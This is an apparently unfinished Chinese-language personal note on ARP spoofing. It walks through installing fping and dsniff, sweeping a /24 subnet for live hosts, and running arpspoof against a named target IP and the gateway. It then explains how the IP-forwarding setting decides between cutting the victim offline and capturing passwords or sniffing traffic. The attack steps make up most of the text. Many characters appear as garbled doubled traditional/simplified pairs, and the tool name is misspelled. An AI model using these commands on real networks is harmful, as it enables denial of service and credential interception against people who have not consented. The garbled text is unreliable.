第一步 apt install fping
第二步 apt install dsniff
fping 命令
系統(tǒng)自帶的ping命令 是針對單個ip的?
針對多個ip 使用fping
fping -ag 192.168.0.1/24? 掃描內(nèi)網(wǎng)所有192.168.0.X下的所有ip
arpsoopf 命令
-i 網(wǎng)卡名 -t 目標(biāo)ip 默認網(wǎng)關(guān)ip
實戰(zhàn)
?fping -ag?192.168.0.1/24
ifconfig? ? //查看網(wǎng)卡
arpspoof -i ens33 -t 192.168.0.71 192.168.0.1?
因為我這里是ubuntu? 所以命令需要sudo權(quán)限
步驟就這么點?
需要停止只需要ctrl+c 就行了
題外篇
less /proc/sys/net/ipv4/ip_forward
查看默認是否內(nèi)網(wǎng)轉(zhuǎn)發(fā)的? ?一般默認值為0? ?(0 為不轉(zhuǎn)發(fā)? 1 為轉(zhuǎn)發(fā))
echo 0 >?/proc/sys/net/ipv4/ip_forward? 關(guān)掉轉(zhuǎn)發(fā)
echo 1 >?/proc/sys/net/ipv4/ip_forward 開啟轉(zhuǎn)發(fā)
這個流量轉(zhuǎn)發(fā)的作用是? 當(dāng)你使用arpsoopf 做arp斷網(wǎng)攻擊的話 (即:是目標(biāo)斷網(wǎng))啟用 0
反之? 若是要做 密碼抓取 arp欺騙 或者流量監(jiān)聽什么的 開啟1 就好
(通常 這是在kali上去玩的 這樣可以避免少踩坑? ?因為我比較順手 ubuntu??
所以我有遇到的坑
)
當(dāng)然 還有一個坑是? arp欺騙成功運行? 也less查看了? 默認使用不轉(zhuǎn)發(fā)了?
但是目標(biāo)機并沒有像網(wǎng)上所說的那樣斷網(wǎng)? ? 本文筆記還沒寫完 后續(xù)我有空會去弄清楚 把筆記完善的
